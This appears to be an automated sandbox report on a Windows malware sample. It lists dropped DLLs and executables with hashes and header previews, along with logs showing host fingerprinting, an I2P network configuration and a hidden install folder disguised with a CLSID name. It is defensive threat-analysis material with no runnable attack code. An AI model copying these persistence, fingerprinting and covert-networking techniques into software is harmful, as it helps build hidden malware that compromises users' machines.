                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb23adb070)..[I] (tcp_connect) -> Done(sock=0x328,host=7
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):92672
                                  Entropy (8bit):6.242846530333761
                                  Encrypted:false
                                  SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                  MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                  SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                  SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
                                  SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):5334
                                  Entropy (8bit):5.400932112557523
                                  Encrypted:false
                                  SSDEEP:48:CFdHs54yclD7hcm9FLZ4WzBMwP/CEB8jVEmjsE9jwE97UWETek:idHrNdJ9VjzBpCEKEJEiEtEl
                                  MD5:63B446C4090EE74115BD9EFEA27AB090
                                  SHA1:72C2E9AA3E5C86C63EE105CB44D5339143F140BD
                                  SHA-256:BE52C8CF9CCB044B32A352C3ADFA4A9F2861AF187892DF92C8D3E867FC9359A2
                                  SHA-512:2EAB6DE83AACC2122B3CDDA2C13BA0BD02DD8BD2FBB61792A2C9B41200FA377AAC6DCC952CAD37075D79A8737A061973D890678E90348B61B5FBF95B2C2BB501
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):8568
                                  Entropy (8bit):4.958673415285098
                                  Encrypted:false
                                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                  MD5:27535CEE6740DFC50A78A0322415E67C
                                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                  Malicious:false
                                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):62449
                                  Entropy (8bit):7.807149241969407
                                  Encrypted:false
                                  SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                  MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                  SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                  SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                  SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                  Malicious:false
                                  Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.584283083217091
                                  Encrypted:false
                                  SSDEEP:12:Tx3MlWzRw3o8KDV7O1cph8XQlYKrfqmMjYN4KIaGMswGTqjhKt:T6lWVwwicp9lYKGmaYN4KIaNsHwKt
                                  MD5:5A69BF992B2C1A1656506371A4CC0B7E
                                  SHA1:8AE7F521F01985F8DC090BBF5ABC929D16BB4363
                                  SHA-256:353D3210A98889339D16BED1C3B4CBB743E3C2E8141A8712FBD1B74ABB34E055
                                  SHA-512:E3DE4ECCD9A6AF8AA0203D9447DDBA5728822DB2E93C5E3B8AA889B2066741DA5B12D88A6232F471F4339C350A39B8A3251311DFC6987843CD765979FA189ED0
                                  Malicious:false
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.555565848052564
                                  Encrypted:false
                                  SSDEEP:12:8m/WOcPTN/sdcI5uss9bHuACCe8oz7DcV6HmYNudwVf3y://AbN/EcI5usIhxy7DNHZudwZi
                                  MD5:082807612529539441959F0CFD84D3CE
                                  SHA1:D4D3192712095C518EB6AFD1EDF18F21BE012B4C
                                  SHA-256:2B6576102ACE0DC16FECD966670E5F13CB2971AA8643D94A2D7270B116CD8E64
                                  SHA-512:AC2B28F18C8F7F68F0D02DA6B9E6C9C8DDE57417A40FAE74D0E6DE40AB5F96BEDC304DD15D540E3106588E41C5F6113ACB4751A4CF071C5C35FE769992A8F680
                                  Malicious:false
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.51647207377326
                                  Encrypted:false
                                  SSDEEP:12:gzWYO4eG81cPe+SxyWHEl5VJEeWEBKxlEs+Ylif:g6YOD1cVS7khJ/PKTEs+5f
                                  MD5:A439CB069ACC06F874268D1BDD6DDB3E
                                  SHA1:54DB59556B5FAF66DCDA321405574D5405541286
                                  SHA-256:E8F4FD6B41CB61331E957402EC52C9844ACFC40D69FC8F14D5408745E0C9E0FE
                                  SHA-512:A25BFB59428E594613F1046603B153932FC8B8C455B89AC22CFA1FCA07F12683AB4B420AB7F28B349EBC33EF484D27A54A63C4426FF057A401A80510FEE3AFCB
                                  Malicious:false
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.599441616503169
                                  Encrypted:false
                                  SSDEEP:12:IWoJ1Rf/wZ5EUbkmJKtrByzIb8RMIq0BkdFbPvY7qGQZH2dJHg:IBydbkmJKtdTOPqakdFbPg7qGqHEJHg
                                  MD5:98118FD2508207878C22CE888A954EC4
                                  SHA1:C3497EEB2455EB61D5AA1959A0C583BED05FFDD0
                                  SHA-256:6E2B5D179F325329DCA4D55D261DAE4406DE7CF71CAB84FD730B35FB1FE33B3C
                                  SHA-512:2DBEB9B8F5C39AEBE59F77DEF6C1D85C36FF3952B7493BD2A0371376F915E1756F7DF99CEC9410F4601E7D504CE20940C3C6DE54CC139EC32BDB407F360FFE51
                                  Malicious:false
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):80
                                  Entropy (8bit):6.1374920011103145
                                  Encrypted:false
                                  SSDEEP:3:aTOlWr1R0TOqNYT83PdKVtFfFOBz:aTOlWhR0BNYYoHlFuz
                                  MD5:7E643A1E79807DEC9A6F435244F2F9EE
                                  SHA1:ACFDB9C7509E9780153BB974C4E2DFEB1A4D0CB0
                                  SHA-256:9DE7F51DBFC362ADF812CC375FFE8FAC3C5A86BBA642D52243E9448367E6AF65
                                  SHA-512:CD7E72BD0678305062E84102223B92D643B670FC8CCC9F57DC375FC5383C6CF8564A5D512FBE9C256063F30B5792020D7FE25E9D0E92502796CC808F9A938DF7
                                  Malicious:false
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):804
                                  Entropy (8bit):6.595283826963492
                                  Encrypted:false
                                  SSDEEP:24:TV3CV3CV3CV3CV3CV3CV3CV3CV3CV3exD97bnqI73WHn:9xbndrWH
                                  MD5:5CB538588D133C69210A503B9C8F4031
                                  SHA1:6706378F1DF214BA74672880AC3A9F38041AB9B5
                                  SHA-256:3101EEE0B514EF0A87F6F5D85BC62F49C1ACC37567C12456BC8C7A2653EDF49F
                                  SHA-512:DD8594516A84A7FD07852D789FFFFFD686079496CFA61A160BDD42E14C19F08628FEA48461D9337EE9981F509D773031E30A13341CB84B7AC1A1C51E25F9D278
                                  Malicious:false
                                  Preview:lJ...&.R.j.?gY...u........4w.....)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_ZC..^..q...F.......P..~kn4...9...........&O.............NTCP2.s.host=.8.46.123.33;.i=.sbpxRoszVoOILboCdBwklg==;.port=.9290;.s=,suCQGj1C2v6EQx6YXMxSbgnejtCGiNG7GrNdJo~79AE=;.v=.2;..........SSU2...caps=.BC;.host=.8.46.123.33;.i=,SQJAXjEGt~KRAvnX~UCYtPV1r4XBu5giXYjffalVtM0=;.port=.9290;.s=,lBPMe0pRAMO786cBQ~yWslh-egtgWG~I~OKMHvjdB18=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;......hfA....".\;.....zd!...H..[.Hj..H[.r.BD...XI.p.......z..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):455
                                  Entropy (8bit):6.030445476463723
                                  Encrypted:false
                                  SSDEEP:12:TV3PqV3PqV3PqV3PqV3PqV3PqV3PqV3PqV3PqV33uQc5Vwgud:TV3CV3CV3CV3CV3CV3CV3CV3CV3CV3eq
                                  MD5:68A2AAF4D66EF76254B9793978FC5BAF
                                  SHA1:16CD7BEDA3381490889DB8D2C29B5B5FE745D14A
                                  SHA-256:C4A019104177864D0DF038C49F136FBC855EE70F3454B01600A5A3BCF04ABA2C
                                  SHA-512:6D569BC7CCD23F28E18A42A0843DCD2DE0ACEE07646CCBB137CBFF219F32771BAD40E1D6D96CEB384BCE6866FF4E9434711AE20185B870D2EABA5F91C9A9DAEE
                                  Malicious:false
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:OpenPGP Secret Key
                                  Category:dropped
                                  Size (bytes):96
                                  Entropy (8bit):6.256735677759421
                                  Encrypted:false
                                  SSDEEP:3:cw08J8pfuH+JPVrXKj6C5plQuuAVXfh:cB8uGe1VrXKj6OplQuuWp
                                  MD5:99091C5B8F4818778AFAE130FF71481C
                                  SHA1:D1C18A8BF6CA7005E2CEB5A27BCF09C68CDB5F56
                                  SHA-256:619212AC75225A30AB31125BD4CE62C400D7D9E124A9238933BE18D89E7E5DD6
                                  SHA-512:369AA9012C960EEF37D8B274CC89F952B1A1EFFB6E26249141B9C9BFAF78A0E4F59462FF8F4409A6CC31E3F411E4C215A01A5361E93285FFFF955A29C1EBD281
                                  Malicious:false
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):9146880
                                  Entropy (8bit):6.674868432808522
                                  Encrypted:false
                                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                  MD5:676064A5CC4729E609539F9C9BD9D427
                                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):89088
                                  Entropy (8bit):6.229509810228039
                                  Encrypted:false
                                  SSDEEP:1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
                                  MD5:4E320E2F46342D6D4657D2ADBF1F22D0
                                  SHA1:A5ACFE6397DFFC61D243206885C389EA05428755
                                  SHA-256:7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
                                  SHA-512:E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 11%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4672
                                  Entropy (8bit):5.346929508396374
                                  Encrypted:false
                                  SSDEEP:96:idHwWdJ9VjyHzHH0Hf0HaSHRmHu5SHSapmHSm5SHr8mHOn5SHfSHbmHX5SHfmHHq:Az3TWTn0/06SIO5SVAz5SLnc5S/SS35c
                                  MD5:C64B5D0247AE347E1282197C83BEACBE
                                  SHA1:5B3CB234F5DD2329B373AF301C9C5CE6749AAE62
                                  SHA-256:1EBAECAB1A967F0762410199A24FC9A36D1F4AF83504515B9F1D8FE32E130196
                                  SHA-512:A4431AC2D3A4C8BFEE3D893A2C4490E3D7151E55ABCE1A60ABA193FA5ACB85407BD42DFC7E0A7A767A8EED984AA389979BEA13870B0FB8B74BD5680771B4E145
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):105984
                                  Entropy (8bit):6.2884725801282775
                                  Encrypted:false
                                  SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                  MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                  SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                  SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                  SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1167
                                  Entropy (8bit):5.5035060062410395
                                  Encrypted:false
                                  SSDEEP:24:CFAGHr5lGyclY7GfyE7Bf7cRE9FLxJN4Jw0ERBXYfHeAOp:CFdHr54yclD7hcm9FLZ4WNGeD
                                  MD5:2FD6406BE7DAB0162F0D1730855E7427
                                  SHA1:83D19EEF6215E54DD1293918C570B00EE95D0B00
                                  SHA-256:B1EC3A8D723B11A58292E8BADEA469CD657034879A3D206EDB92031D822844D9
                                  SHA-512:1286EDCDEC7E72D3BC457A7F599A5267268133AA221AECF6E23C220E5BEA030B39796F099C065BB48E80CF636CDE04C8BD649EF2FFCB7ECD0F6330E925C5D467
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb22769d36)..[I] (tcp_connect) -> Done(sock=0x358,host=7
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):129024
                                  Entropy (8bit):6.313152038164236
                                  Encrypted:false
                                  SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                  MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                  SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                  SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                  SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1354
                                  Entropy (8bit):5.501893800293231
                                  Encrypted:false
                                  SSDEEP:24:CFAGH75lGyclY7GfyE7Bf7cRE9FLxJN4Jw0dk1RDobXY1zYcRAENmMeAOp:CFdH754yclD7hcm9FLZ4W+JcLMMeD
                                  MD5:0E38F5C21FA0EDEB4572E2E9003AC989
                                  SHA1:4F4C26851C0EBE18681903263CEBF8114D1F1C34
                                  SHA-256:0CB7C4B55F53EB2678274380D61845FF0F65C5DDAD3966BE0346CB8AA3EDB233
                                  SHA-512:7C8E1A09FCFD2CA24AD7A9695F776AF8BB34F32963CEF680D3DB8CC87EFD9BD66C34FD1B105CB54497F5EC1F24905CED420412C8230AE0A3833FF3DBA45193BE
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb2273
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):37376
                                  Entropy (8bit):5.7181012847214445
                                  Encrypted:false
                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
